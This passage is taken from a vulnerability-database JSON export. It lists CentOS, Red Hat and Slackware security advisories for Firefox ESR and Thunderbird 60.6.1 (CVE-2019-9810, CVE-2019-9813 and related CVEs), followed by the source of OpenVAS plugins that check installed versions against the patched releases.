(CVE-2019-9788)\n\n* Mozilla: Use-after-free when removing in-use DOM elements (CVE-2019-9790)\n\n* Mozilla: Type inference is incorrect for constructors entered through on-stack replacement with IonMonkey (CVE-2019-9791)\n\n* Mozilla: IonMonkey leaks 
JS_OPTIMIZED_OUT magic value to script (CVE-2019-9792)\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information (CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations (CVE-2019-9813)\n\n* Mozilla: Improper bounds checks when Spectre mitigations are disabled (CVE-2019-9793)\n\n* Mozilla: Type-confusion in IonMonkey JIT compiler (CVE-2019-9795)\n\n* Mozilla: Use-after-free with SMIL animation controller (CVE-2019-9796)\n\n* Mozilla: Proxy Auto-Configuration file can define localhost access to be proxied (CVE-2018-18506)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2019-April/035294.html\n\n**Affected packages:**\nthunderbird\n\n**Upstream details at:**\n", "edition": 7, "modified": "2019-04-01T19:06:22", "published": "2019-04-01T19:06:22", "id": "CESA-2019:0680", "href": "http://lists.centos.org/pipermail/centos-announce/2019-April/035294.html", "title": "thunderbird security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-08T03:39:42", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2018-18509", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-5785", "CVE-2019-9796", "CVE-2019-9790", "CVE-2018-18506", "CVE-2018-18356"], "description": "**CentOS Errata and Security Advisory** CESA-2019:0681\n\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 60.6.1.\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 66 and Firefox ESR 60.6 (CVE-2019-9788)\n\n* Mozilla: Use-after-free when removing in-use DOM elements (CVE-2019-9790)\n\n* Mozilla: Type inference is incorrect for 
constructors entered through on-stack replacement with IonMonkey (CVE-2019-9791)\n\n* Mozilla: IonMonkey leaks JS_OPTIMIZED_OUT magic value to script (CVE-2019-9792)\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information (CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations (CVE-2019-9813)\n\n* Mozilla: Improper bounds checks when Spectre mitigations are disabled (CVE-2019-9793)\n\n* Mozilla: Type-confusion in IonMonkey JIT compiler (CVE-2019-9795)\n\n* Mozilla: Use-after-free with SMIL animation controller (CVE-2019-9796)\n\n* Mozilla: Proxy Auto-Configuration file can define localhost access to be proxied (CVE-2018-18506)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2019-April/035296.html\n\n**Affected packages:**\nthunderbird\n\n**Upstream details at:**\n", "edition": 7, "modified": "2019-04-01T19:08:08", "published": "2019-04-01T19:08:08", "id": "CESA-2019:0681", "href": "http://lists.centos.org/pipermail/centos-announce/2019-April/035296.html", "title": "thunderbird security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:44:51", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9810", "CVE-2019-9813"], "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information (CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations (CVE-2019-9813)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, 
refer to the CVE page(s) listed in the References section.", "modified": "2019-03-27T11:41:25", "published": "2019-03-27T11:14:51", "id": "RHSA-2019:0671", "href": "https://access.redhat.com/errata/RHSA-2019:0671", "type": "redhat", "title": "(RHSA-2019:0671) Critical: firefox security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:11", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9810", "CVE-2019-9813"], "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information (CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations (CVE-2019-9813)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-03-27T12:57:56", "published": "2019-03-27T12:48:21", "id": "RHSA-2019:0672", "href": "https://access.redhat.com/errata/RHSA-2019:0672", "type": "redhat", "title": "(RHSA-2019:0672) Critical: firefox security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:16", "bulletinFamily": "unix", "cvelist": ["CVE-2018-18506", "CVE-2019-9788", "CVE-2019-9790", "CVE-2019-9791", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9810", "CVE-2019-9813"], "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR. 
(BZ#1690308)\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 66 and Firefox ESR 60.6 (CVE-2019-9788)\n\n* Mozilla: Use-after-free when removing in-use DOM elements (CVE-2019-9790)\n\n* Mozilla: Type inference is incorrect for constructors entered through on-stack replacement with IonMonkey (CVE-2019-9791)\n\n* Mozilla: IonMonkey leaks JS_OPTIMIZED_OUT magic value to script (CVE-2019-9792)\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information (CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations (CVE-2019-9813)\n\n* Mozilla: Improper bounds checks when Spectre mitigations are disabled (CVE-2019-9793)\n\n* Mozilla: Type-confusion in IonMonkey JIT compiler (CVE-2019-9795)\n\n* Mozilla: Use-after-free with SMIL animation controller (CVE-2019-9796)\n\n* Mozilla: Proxy Auto-Configuration file can define localhost access to be proxied (CVE-2018-18506)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-05-07T08:06:15", "published": "2019-05-07T07:37:57", "id": "RHSA-2019:0966", "href": "https://access.redhat.com/errata/RHSA-2019:0966", "type": "redhat", "title": "(RHSA-2019:0966) Critical: firefox security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-11T13:32:16", "bulletinFamily": "unix", "cvelist": ["CVE-2018-18356", "CVE-2018-18506", "CVE-2018-18509", "CVE-2019-5785", "CVE-2019-9788", "CVE-2019-9790", "CVE-2019-9791", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9810", "CVE-2019-9813"], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 60.6.1.\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 66 and Firefox ESR 60.6 (CVE-2019-9788)\n\n* Mozilla: Use-after-free when 
removing in-use DOM elements (CVE-2019-9790)\n\n* Mozilla: Type inference is incorrect for constructors entered through on-stack replacement with IonMonkey (CVE-2019-9791)\n\n* Mozilla: IonMonkey leaks JS_OPTIMIZED_OUT magic value to script (CVE-2019-9792)\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information (CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations (CVE-2019-9813)\n\n* Mozilla: Improper bounds checks when Spectre mitigations are disabled (CVE-2019-9793)\n\n* Mozilla: Type-confusion in IonMonkey JIT compiler (CVE-2019-9795)\n\n* Mozilla: Use-after-free with SMIL animation controller (CVE-2019-9796)\n\n* Mozilla: Proxy Auto-Configuration file can define localhost access to be proxied (CVE-2018-18506)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-06-03T06:03:09", "published": "2019-03-28T16:55:12", "id": "RHSA-2019:0680", "href": "https://access.redhat.com/errata/RHSA-2019:0680", "type": "redhat", "title": "(RHSA-2019:0680) Important: thunderbird security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-11T13:30:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-18356", "CVE-2018-18506", "CVE-2018-18509", "CVE-2019-5785", "CVE-2019-9788", "CVE-2019-9790", "CVE-2019-9791", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9810", "CVE-2019-9813"], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 60.6.1. 
(BZ#1692449)\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 66 and Firefox ESR 60.6 (CVE-2019-9788)\n\n* Mozilla: Use-after-free when removing in-use DOM elements (CVE-2019-9790)\n\n* Mozilla: Type inference is incorrect for constructors entered through on-stack replacement with IonMonkey (CVE-2019-9791)\n\n* Mozilla: IonMonkey leaks JS_OPTIMIZED_OUT magic value to script (CVE-2019-9792)\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information (CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations (CVE-2019-9813)\n\n* Mozilla: Improper bounds checks when Spectre mitigations are disabled (CVE-2019-9793)\n\n* Mozilla: Type-confusion in IonMonkey JIT compiler (CVE-2019-9795)\n\n* Mozilla: Use-after-free with SMIL animation controller (CVE-2019-9796)\n\n* Mozilla: Proxy Auto-Configuration file can define localhost access to be proxied (CVE-2018-18506)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-06-03T06:03:07", "published": "2019-05-13T08:51:25", "id": "RHSA-2019:1144", "href": "https://access.redhat.com/errata/RHSA-2019:1144", "type": "redhat", "title": "(RHSA-2019:1144) Important: thunderbird security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:36:15", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9810", "CVE-2019-9813"], "description": "New mozilla-firefox packages are available for Slackware 14.2 and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/mozilla-firefox-60.6.1esr-i686-1_slack14.2.txz: Upgraded.\n This release contains security fixes and improvements. 
The patched flaws\n are considered critical, and could be used to run attacker code and install\n software, requiring no user interaction beyond normal browsing.\n For more information, see:\n https://www.mozilla.org/security/known-vulnerabilities/firefoxESR.html\n https://www.mozilla.org/en-US/security/advisories/mfsa2019-10/\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9810i\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9813\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/mozilla-firefox-60.6.1esr-i686-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/mozilla-firefox-60.6.1esr-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-60.6.1esr-i686-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-60.6.1esr-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.2 package:\nc37b038f81e5b07a9927ada82bb4fb4a mozilla-firefox-60.6.1esr-i686-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n8c372c3b4f4479fb2ec59b87d9460713 mozilla-firefox-60.6.1esr-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n5b03626dff034f6daf229cdc83c17ddf xap/mozilla-firefox-60.6.1esr-i686-1.txz\n\nSlackware x86_64 -current package:\na23c229838e378fc0a38e7a76c27edc1 xap/mozilla-firefox-60.6.1esr-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg mozilla-firefox-60.6.1esr-i686-1_slack14.2.txz", 
"modified": "2019-03-22T21:29:01", "published": "2019-03-22T21:29:01", "id": "SSA-2019-081-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2019&m=slackware-security.386904", "type": "slackware", "title": "[slackware-security] mozilla-firefox", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:32:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "This host is installed with Mozilla\n Thunderbird and is prone to multiple vulnerabilities.", "modified": "2019-05-03T00:00:00", "published": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310814942", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814942", "type": "openvas", "title": "Mozilla Thunderbird Security Updates(mfsa_2019-12_2019-12)-Windows", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nCPE = \"cpe:/a:mozilla:thunderbird\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814942\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-26 11:23:42 +0530 (Tue, 26 Mar 2019)\");\n script_name(\"Mozilla Thunderbird Security Updates(mfsa_2019-12_2019-12)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla\n Thunderbird and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - IonMonkey MArraySlice has incorrect alias information and\n\n - Ionmonkey type confusion with __proto__ mutations..\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers execute arbitrary code and cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Thunderbird version before 60.6.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Thunderbird version 60.6.1. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-12/\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/thunderbird\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_thunderbird_detect_win.nasl\");\n script_mandatory_keys(\"Thunderbird/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\ntbVer = infos['version'];\ntbPath = infos['location'];\n\nif(version_is_less(version:tbVer, test_version:\"60.6.1\"))\n{\n report = report_fixed_ver(installed_version:tbVer, fixed_version:\"60.6.1\", install_path:tbPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T21:46:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310814941", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814941", "type": "openvas", "title": "Mozilla Firefox Security Updates(mfsa_2019-09_2019-10)-MAC OS X", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free 
Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nCPE = \"cpe:/a:mozilla:firefox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814941\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-26 10:56:20 +0530 (Tue, 26 Mar 2019)\");\n script_name(\"Mozilla Firefox Security Updates(mfsa_2019-09_2019-10)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - IonMonkey MArraySlice has incorrect alias information and\n\n - Ionmonkey type confusion with __proto__ mutations.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox version before 66.0.1 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox version 66.0.1 or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-09/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Mozilla/Firefox/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nffVer = infos['version'];\nffPath = infos['location'];\n\nif(version_is_less(version:ffVer, test_version:\"66.0.1\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"66.0.1\", install_path:ffPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T16:53:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2019-04-05T00:00:00", "id": "OPENVAS:1361412562310852395", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852395", "type": "openvas", "title": "openSUSE: Security Advisory for MozillaThunderbird (openSUSE-SU-2019:1152-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later 
version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852395\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-04-05 02:00:46 +0000 (Fri, 05 Apr 2019)\");\n script_name(\"openSUSE: Security Advisory for MozillaThunderbird (openSUSE-SU-2019:1152-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:1152-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-04/msg00026.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'MozillaThunderbird'\n package(s) announced via the openSUSE-SU-2019:1152-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for MozillaThunderbird fixes the following issues:\n\n Security issues fixed:\n\n - update to 
Mozilla Thunderbird 60.6.1 (bsc#1130262):\n\n - CVE-2019-9813: Fixed Ionmonkey type confusion with __proto__ mutations\n\n - CVE-2019-9810: Fixed IonMonkey MArraySlice incorrect alias information\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2019-1152=1\");\n\n script_tag(name:\"affected\", value:\"'MozillaThunderbird' package(s) on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird\", rpm:\"MozillaThunderbird~60.6.1~89.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-buildsymbols\", rpm:\"MozillaThunderbird-buildsymbols~60.6.1~89.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-debuginfo\", rpm:\"MozillaThunderbird-debuginfo~60.6.1~89.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-debugsource\", rpm:\"MozillaThunderbird-debugsource~60.6.1~89.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-translations-common\", rpm:\"MozillaThunderbird-translations-common~60.6.1~89.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-translations-other\", 
rpm:\"MozillaThunderbird-translations-other~60.6.1~89.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "The remote host is missing an update for the ", "modified": "2019-05-01T00:00:00", "published": "2019-04-03T00:00:00", "id": "OPENVAS:1361412562310883029", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310883029", "type": "openvas", "title": "CentOS Update for firefox CESA-2019:0671 centos7 ", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.883029\");\n script_version(\"2019-05-01T16:02:02+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-01 16:02:02 +0000 (Wed, 01 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-03 06:38:56 +0000 (Wed, 03 Apr 2019)\");\n script_name(\"CentOS Update for firefox CESA-2019:0671 centos7 \");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n\n script_xref(name:\"CESA\", value:\"2019:0671\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2019-April/023257.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the CESA-2019:0671 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open-source web browser, designed for standards\ncompliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es):\n\n * Mozilla: IonMonkey MArraySlice has incorrect alias information\n(CVE-2019-9810)\n\n * Mozilla: Ionmonkey type confusion with __proto__ mutations\n(CVE-2019-9813)\n\nFor more details 
